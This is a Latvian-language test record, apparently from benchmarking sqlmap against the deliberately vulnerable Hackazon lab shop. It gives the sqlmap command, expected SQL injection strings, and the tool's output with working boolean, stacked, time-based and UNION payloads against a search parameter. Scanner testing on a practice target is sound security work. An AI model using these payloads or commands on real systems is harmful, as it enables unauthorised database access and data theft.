=================================================================================
0. SVARĪGA PIEZĪME: Lai viss strādātu vietnē "http://hackazon.lc/admin/vulnerability?context=search" tika pievienota laukam vājība "Add Vulnerability" "SQL"
1. Īpašība: pseidoreāla internetveikla meklētājs
2. Nepiciešams tampering: nē
3. Sagaidāmais rezultāts: 
3.1. boolean-based: test' or 1=1-- -
3.2. error-based: test'
3.3. time-based: test' or sleep(1)-- -
3.4. union: -
4. Reālais rezultāts: redzams zemāk (neatklāts false positive)
5. Vidējais risinājuma ilgums: 3231439600 nanosekundes
6. Palaistā komanda
sqlmap -u "http://hackazon.lc/search?id=&searchString=test" -p searchString  --risk=3 --level=5

7. Jautājumi, kurus uzdeva SQLMap:
7.1. you have not declared cookie(s), while server wants to set its own ('PHPSESSID=4cu25hpjs5p...t0ebmvn7v3'). Do you want to use those [Y/n] y
7.2. it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
7.3. GET parameter 'searchString' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
=================================================================================
sqlmap identified the following injection point(s) with a total of 170 HTTP(s) requests:
---
Parameter: searchString (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: id=&searchString=-5243' OR 8522=8522-- lefz

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: id=&searchString=test';SELECT SLEEP(5)#

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=&searchString=test' AND (SELECT 2928 FROM (SELECT(SLEEP(5)))EUkI)-- mTaT

    Type: UNION query (FALSE POSITIVE)
    Title: Generic UNION query (NULL) - 27 columns
    Payload: id=&searchString=test' UNION ALL SELECT NULL,NULL,CONCAT(0x716b627a71,0x42794550564d4b5a71584e59766c676653624f726f4e4e6c42754e6f75564b5756477646564f764f,0x71716b6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
web application technology: PHP 5.6.40, PHP, Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12
